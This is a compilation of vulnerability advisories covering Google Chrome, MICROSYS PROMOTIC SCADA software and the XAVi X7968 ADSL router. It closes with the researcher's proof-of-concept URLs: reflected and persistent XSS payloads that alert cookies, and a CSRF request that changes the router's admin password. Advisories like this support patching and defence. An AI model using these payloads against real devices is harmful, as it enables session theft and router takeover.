https://ca.secunia.com/?page=viewadvisory&vuln_id=46308
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Google Chrome, which
can be exploited by malicious people to bypass certain security
restrictions and compromise a user's system.
1) A use-after-free error exists in text line box handling.
2) An error in the SVG text handling can be exploited to reference a
stale font.
3) An error exists within cross-origin access handling associated
with a window prototype.
4) Some errors exist within audio node handling related to lifetime
and threading.
5) A use-after-free error exists in the v8 bindings.
6) An error when handling v8 hidden objects can be exploited to
corrupt memory.
7) An error in the shader translator can be exploited to corrupt
memory.
The vulnerabilities are reported in versions prior to 14.0.835.202.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits:
1, 2) miaubiz
3, 5, 6) Sergey Glazunov
4) Inferno, Google Chrome Security Team
7) Zhenyao Mo, Chromium development community
ORIGINAL ADVISORY:
Google:
http://googlechromereleases.blogspot.com/2011/10/stable-channel-update.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-201305-0006 | CVE-2011-4518 | MICROSYS PROMOTIC Directory Traversal Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Directory traversal vulnerability in the PmWebDir object in the web server in MICROSYS PROMOTIC before 8.1.5 allows remote attackers to read arbitrary files via unspecified vectors. PROMOTIC is a SCADA software. A directory traversal vulnerability exists in MICROSYS PROMOTIC. PROMOTIC is prone to multiple security vulnerabilities.
Exploiting these issues may allow remote attackers to execute arbitrary code within the context of the affected application or disclose sensitive information.
PROMOTIC 8.1.3 is vulnerable; other versions may also be affected
VAR-201305-0005 | CVE-2011-4520 | MICROSYS PROMOTIC ActiveX Component Heap Buffer Overflow Vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Heap-based buffer overflow in an ActiveX component in MICROSYS PROMOTIC before 8.1.5 allows remote attackers to cause a denial of service via a crafted web page. MICROSYS PROMOTIC is a SCADA software. PROMOTIC is prone to multiple security vulnerabilities.
Exploiting these issues may allow remote attackers to execute arbitrary code within the context of the affected application or disclose sensitive information.
PROMOTIC 8.1.3 is vulnerable; other versions may also be affected
VAR-201210-0416 | CVE-2012-5322 |
Xavi X7968 Vulnerable to cross-site scripting
Related entries in the VARIoT exploits database: VAR-E-201202-0072, VAR-E-201202-0070, VAR-E-201202-0071 |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in Xavi X7968 allow remote attackers to inject arbitrary web script or HTML via the (1) pvcName parameter to webconfig/wan/confirm.html/confirm or (2) host_name_txtbox parameter to webconfig/lan/lan_config.html/local_lan_config. (1) webconfig/wan/confirm.html/confirm of pvcName Parameters (2) webconfig/lan/lan_config.html/local_lan_config of host_name_txtbox Parameters. The Xavi 7968 ADSL Router is an ADSL router device. There is a vulnerability in the Xavi 7968 ADSL Router. Because the program fails to properly validate user-submitted requests, an attacker can build a malicious URI, trick the user into parsing, and run privileged commands on the device, such as changing the configuration, performing a denial of service attack, or injecting arbitrary script code. Xavi 7968 ADSL Router is prone to cross-site scripting, HTML-injection and cross-site request forgery vulnerabilities.
The attacker can exploit the issues to execute arbitrary script code in the context of the vulnerable site, potentially allowing the attacker to steal cookie-based authentication credentials, or perform certain administrative functions on victim's behalf. Other attacks are also possible. ----------------------------------------------------------------------
Become a PSI 3.0 beta tester!
Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface.
Download it here!
http://secunia.com/psi_30_beta_launch
----------------------------------------------------------------------
TITLE:
XAVi X7968 Cross-Site Scripting and Request Forgery Vulnerabilities
SECUNIA ADVISORY ID:
SA48050
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/48050/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=48050
RELEASE DATE:
2012-03-06
DISCUSS ADVISORY:
http://secunia.com/advisories/48050/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/48050/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=48050
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Two vulnerabilities have been reported in XAVi X7968, which can be
exploited by malicious people to conduct cross-site scripting and
request forgery attacks.
1) Input passed via the "pvcName" parameter to
webconfig/wan/confirm.html/confirm is not properly sanitised before
being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context
of an affected device.
2) The device's web interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to e.g. change an administrator's
password or conduct script insertion attacks by tricking a logged in
administrator into visiting a malicious web site.
SOLUTION:
Filter malicious characters and character sequences using a proxy. Do
not browse untrusted sites or follow untrusted links while being
logged-in to the device.
PROVIDED AND/OR DISCOVERED BY:
Busindre
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. (Admin privileges)
** XSS example: (Alert with Cookie)
http://192.168.1.1/webconfig/wan/confirm.html/confirm?context=pageAction%3Dadd%26pvcName%3D%2522%253e%253c%252ftd%253e%253cscript%253ealert%28document.cookie%29%253c%252fscript%253e%26vpi%3D0%26vci%3D38%26scat%3DUBR%26accessmode%3Dpppoe%26encap%3Dvcmux%26encapmode%3Dbridged%26iptype%3Ddhcp%26nat_enable%3Dfalse%26def_route_enable%3Dfalse%26qos_enable%3Dfalse%26chkPPPOEAC%3Dfalse%26tBoxPPPOEAC%3DNot%2520Configured%26sessiontype%3Dalways_on%26username%3Da%26password%3Dss&confirm=+Apply+
** Persistent XSS example: (Alert with Cookie)
Add code: http://192.168.1.1/webconfig/lan/lan_config.html/local_lan_config?ip_add_txtbox=192.168.1.1&sub_mask_txtbox=255.255.255.0&host_name_txtbox=Hack<SCRIPT>alert(document.cookie)</script>&domain_name_txtbox=local.lan&mtu_txtbox=1500&next=Apply
Exploit URL: http://192.168.1.1/webconfig/upgrade_image/image_upgrade.html
** Cross site request forgery example: (Change admin Password 1234 -> 12345):
http://192.168.1.2/webconfig/admin_passwd/passwd.html/admin_passwd?sysUserName=1234&sysPassword=12345&sysCfmPwd=12345&cmdSubmit=Apply
This is just an example, all forms in the router interface are vulnerable to CSRF and if they accept text input, to XSS.
Author: Busindre busilezas[@]gmail.com